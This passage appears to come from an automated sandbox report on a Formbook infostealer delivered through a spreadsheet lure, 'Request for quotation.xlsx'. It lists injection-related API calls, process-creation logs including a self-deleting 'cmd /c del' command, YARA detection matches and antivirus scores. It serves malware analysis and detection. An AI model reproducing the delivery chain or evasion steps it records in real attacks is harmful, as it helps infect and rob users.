Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228FC60 NtMapViewOfSection,LdrInitializeThunk, 9_2_0228FC60
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228FD8C NtDelayExecution,LdrInitializeThunk, 9_2_0228FD8C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228FDC0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_0228FDC0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_02290060 NtQuerySection, 9_2_02290060
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_02290078 NtResumeThread, 9_2_02290078
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_02290048 NtProtectVirtualMemory, 9_2_02290048
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0229010C NtOpenDirectoryObject, 9_2_0229010C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022901D4 NtSetValueKey, 9_2_022901D4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_02290C40 NtGetContextThread, 9_2_02290C40
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022910D0 NtOpenProcessToken, 9_2_022910D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_02291148 NtOpenThread, 9_2_02291148
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228FA20 NtQueryInformationFile, 9_2_0228FA20
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228FA50 NtEnumerateValueKey, 9_2_0228FA50
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228FAB8 NtQueryValueKey, 9_2_0228FAB8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228FAD0 NtAllocateVirtualMemory, 9_2_0228FAD0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228FBE8 NtQueryVirtualMemory, 9_2_0228FBE8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228F8CC NtWaitForSingleObject, 9_2_0228F8CC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228F938 NtWriteFile, 9_2_0228F938
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_02291930 NtSetContextThread, 9_2_02291930
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228FE24 NtWriteVirtualMemory, 9_2_0228FE24
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228FEA0 NtReadVirtualMemory, 9_2_0228FEA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228FF34 NtQueueApcThread, 9_2_0228FF34
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228FFFC NtCreateProcessEx, 9_2_0228FFFC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228FC30 NtOpenProcess, 9_2_0228FC30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228FC48 NtSetInformationFile, 9_2_0228FC48
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228FC90 NtUnmapViewOfSection, 9_2_0228FC90
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228FD5C NtEnumerateKey, 9_2_0228FD5C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_02291D80 NtSuspendThread, 9_2_02291D80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_00099D60 NtCreateFile, 9_2_00099D60
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_00099E10 NtReadFile, 9_2_00099E10
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_00099E90 NtClose, 9_2_00099E90
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_00099E0A NtReadFile, 9_2_00099E0A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_00099E8F NtClose, 9_2_00099E8F
Contains functionality to communicate with device drivers
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_4A55A902: CreateFileW,DeviceIoControl,memcpy,CloseHandle,FindFirstStreamW,FindNextStreamW,FindClose, 9_2_4A55A902
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_00035247 4_2_00035247
Source: C:\Users\Public\vbc.exe Code function: 4_2_00035A63 4_2_00035A63
Source: C:\Users\Public\vbc.exe Code function: 4_2_00381E00 4_2_00381E00
Source: C:\Users\Public\vbc.exe Code function: 4_2_0038A118 4_2_0038A118
Source: C:\Users\Public\vbc.exe Code function: 4_2_003872B2 4_2_003872B2
Source: C:\Users\Public\vbc.exe Code function: 4_2_003872C0 4_2_003872C0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00381B88 4_2_00381B88
Source: C:\Users\Public\vbc.exe Code function: 4_2_00381B82 4_2_00381B82
Source: C:\Users\Public\vbc.exe Code function: 4_2_00385D70 4_2_00385D70
Source: C:\Users\Public\vbc.exe Code function: 4_2_00385D60 4_2_00385D60
Source: C:\Users\Public\vbc.exe Code function: 4_2_00381DF4 4_2_00381DF4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00035247 5_2_00035247
Source: C:\Users\Public\vbc.exe Code function: 5_2_00035A63 5_2_00035A63
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041E87B 7_2_0041E87B
Source: C:\Users\Public\vbc.exe Code function: 7_2_00401030 7_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 7_2_00402D88 7_2_00402D88
Source: C:\Users\Public\vbc.exe Code function: 7_2_00402D90 7_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 7_2_00409E40 7_2_00409E40
Source: C:\Users\Public\vbc.exe Code function: 7_2_00409E3B 7_2_00409E3B
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041DFAF 7_2_0041DFAF
Source: C:\Users\Public\vbc.exe Code function: 7_2_00402FB0 7_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A3E0C6 7_2_00A3E0C6
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A3E2E9 7_2_00A3E2E9
Source: C:\Users\Public\vbc.exe Code function: 7_2_00AE63BF 7_2_00AE63BF
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A663DB 7_2_00A663DB
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A42305 7_2_00A42305
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A8A37B 7_2_00A8A37B
Source: C:\Users\Public\vbc.exe Code function: 7_2_00AC443E 7_2_00AC443E
Source: C:\Users\Public\vbc.exe Code function: 7_2_00AC05E3 7_2_00AC05E3
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A5C5F0 7_2_00A5C5F0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A86540 7_2_00A86540
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A44680 7_2_00A44680
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A4E6C1 7_2_00A4E6C1
Source: C:\Users\Public\vbc.exe Code function: 7_2_00AE2622 7_2_00AE2622
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A8A634 7_2_00A8A634
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A4C7BC 7_2_00A4C7BC
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A6286D 7_2_00A6286D
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A4C85C 7_2_00A4C85C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A429B2 7_2_00A429B2
Source: C:\Users\Public\vbc.exe Code function: 7_2_00AE098E 7_2_00AE098E
Source: C:\Users\Public\vbc.exe Code function: 7_2_00AD49F5 7_2_00AD49F5
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A569FE 7_2_00A569FE
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A8C920 7_2_00A8C920
Source: C:\Users\Public\vbc.exe Code function: 7_2_00AECBA4 7_2_00AECBA4
Source: C:\Users\Public\vbc.exe Code function: 7_2_00AC6BCB 7_2_00AC6BCB
Source: C:\Users\Public\vbc.exe Code function: 7_2_00AE2C9C 7_2_00AE2C9C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00ACAC5E 7_2_00ACAC5E
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A70D3B 7_2_00A70D3B
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A4CD5B 7_2_00A4CD5B
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A72E2F 7_2_00A72E2F
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A5EE4C 7_2_00A5EE4C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00ADCFB1 7_2_00ADCFB1
Source: C:\Users\Public\vbc.exe Code function: 7_2_00AB2FDC 7_2_00AB2FDC
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A50F3F 7_2_00A50F3F
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A6D005 7_2_00A6D005
Source: C:\Users\Public\vbc.exe Code function: 7_2_00ABD06D 7_2_00ABD06D
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A43040 7_2_00A43040
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A5905A 7_2_00A5905A
Source: C:\Users\Public\vbc.exe Code function: 7_2_00ACD13F 7_2_00ACD13F
Source: C:\Users\Public\vbc.exe Code function: 7_2_00AE1238 7_2_00AE1238
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A3F3CF 7_2_00A3F3CF
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A47353 7_2_00A47353
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A75485 7_2_00A75485
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A51489 7_2_00A51489
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A7D47D 7_2_00A7D47D
Source: C:\Users\Public\vbc.exe Code function: 7_2_00AE35DA 7_2_00AE35DA
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A4351F 7_2_00A4351F
Source: C:\Users\Public\vbc.exe Code function: 7_2_00AC579A 7_2_00AC579A
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A757C3 7_2_00A757C3
Source: C:\Users\Public\vbc.exe Code function: 7_2_00AD771D 7_2_00AD771D
Source: C:\Users\Public\vbc.exe Code function: 7_2_00ADF8EE 7_2_00ADF8EE
Source: C:\Users\Public\vbc.exe Code function: 7_2_00ABF8C4 7_2_00ABF8C4
Source: C:\Users\Public\vbc.exe Code function: 7_2_00AC394B 7_2_00AC394B
Source: C:\Users\Public\vbc.exe Code function: 7_2_00AC5955 7_2_00AC5955
Source: C:\Users\Public\vbc.exe Code function: 7_2_00AF3A83 7_2_00AF3A83
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A3FBD7 7_2_00A3FBD7
Source: C:\Users\Public\vbc.exe Code function: 7_2_00ACDBDA 7_2_00ACDBDA
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A67B00 7_2_00A67B00
Source: C:\Users\Public\vbc.exe Code function: 7_2_00ADFDDD 7_2_00ADFDDD
Source: C:\Users\Public\vbc.exe Code function: 7_2_00ACBF14 7_2_00ACBF14
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A6DF7C 7_2_00A6DF7C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_4A55B210 9_2_4A55B210
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_4A5612D2 9_2_4A5612D2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_4A55276A 9_2_4A55276A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_4A55E46C 9_2_4A55E46C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_4A5639B6 9_2_4A5639B6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0229E2E9 9_2_0229E2E9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022A2305 9_2_022A2305
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022EA37B 9_2_022EA37B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_023463BF 9_2_023463BF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022C63DB 9_2_022C63DB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0229E0C6 9_2_0229E0C6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_02342622 9_2_02342622
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022EA634 9_2_022EA634
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022A4680 9_2_022A4680
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022AE6C1 9_2_022AE6C1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022AC7BC 9_2_022AC7BC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0232443E 9_2_0232443E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022E6540 9_2_022E6540
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_023205E3 9_2_023205E3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022BC5F0 9_2_022BC5F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0234CBA4 9_2_0234CBA4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_02326BCB 9_2_02326BCB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022C286D 9_2_022C286D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022AC85C 9_2_022AC85C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022EC920 9_2_022EC920
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022A29B2 9_2_022A29B2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0234098E 9_2_0234098E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_023349F5 9_2_023349F5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022B69FE 9_2_022B69FE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022D2E2F 9_2_022D2E2F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022BEE4C 9_2_022BEE4C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022B0F3F 9_2_022B0F3F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0233CFB1 9_2_0233CFB1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_02312FDC 9_2_02312FDC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0232AC5E 9_2_0232AC5E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_02342C9C 9_2_02342C9C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022D0D3B 9_2_022D0D3B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022ACD5B 9_2_022ACD5B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_02341238 9_2_02341238
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022A7353 9_2_022A7353
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0229F3CF 9_2_0229F3CF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022CD005 9_2_022CD005
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0231D06D 9_2_0231D06D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022A3040 9_2_022A3040
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022B905A 9_2_022B905A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0232D13F 9_2_0232D13F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0233771D 9_2_0233771D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0232579A 9_2_0232579A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022D57C3 9_2_022D57C3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022DD47D 9_2_022DD47D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022B1489 9_2_022B1489
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022D5485 9_2_022D5485
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022A351F 9_2_022A351F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_023435DA 9_2_023435DA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_02353A83 9_2_02353A83
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022C7B00 9_2_022C7B00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0232DBDA 9_2_0232DBDA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0229FBD7 9_2_0229FBD7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0233F8EE 9_2_0233F8EE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0231F8C4 9_2_0231F8C4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_02325955 9_2_02325955
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0232394B 9_2_0232394B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0232BF14 9_2_0232BF14
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022CDF7C 9_2_022CDF7C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0233FDDD 9_2_0233FDDD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_00082D88 9_2_00082D88
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_00082D90 9_2_00082D90
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_00089E3B 9_2_00089E3B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_00089E40 9_2_00089E40
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0009DFAF 9_2_0009DFAF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_00082FB0 9_2_00082FB0
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: Request for quotation.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 00A8373B appears 253 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00A83F92 appears 132 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00A3E2A8 appears 60 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00AAF970 appears 84 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00A3DF5C appears 137 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 0229DF5C appears 137 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 022E3F92 appears 132 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 022E373B appears 253 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 0229E2A8 appears 60 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 0230F970 appears 84 times
Yara signature match
Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@13/3@2/2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_4A563185 GetDiskFreeSpaceExW, 9_2_4A563185
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Request for quotation.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR1F71.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Request for quotation.xlsx Virustotal: Detection: 33%
Source: Request for quotation.xlsx ReversingLabs: Detection: 22%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: Request for quotation.xlsx Static file information: File size 2205696 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: cmd.pdb,$ source: vbc.exe, 00000007.00000003.2278081880.000000000093C000.00000004.00000001.sdmp
Source: Binary string: cmd.pdb,$WJ6$WJ@$WJ source: vbc.exe, 00000007.00000003.2278106711.000000000097A000.00000004.00000001.sdmp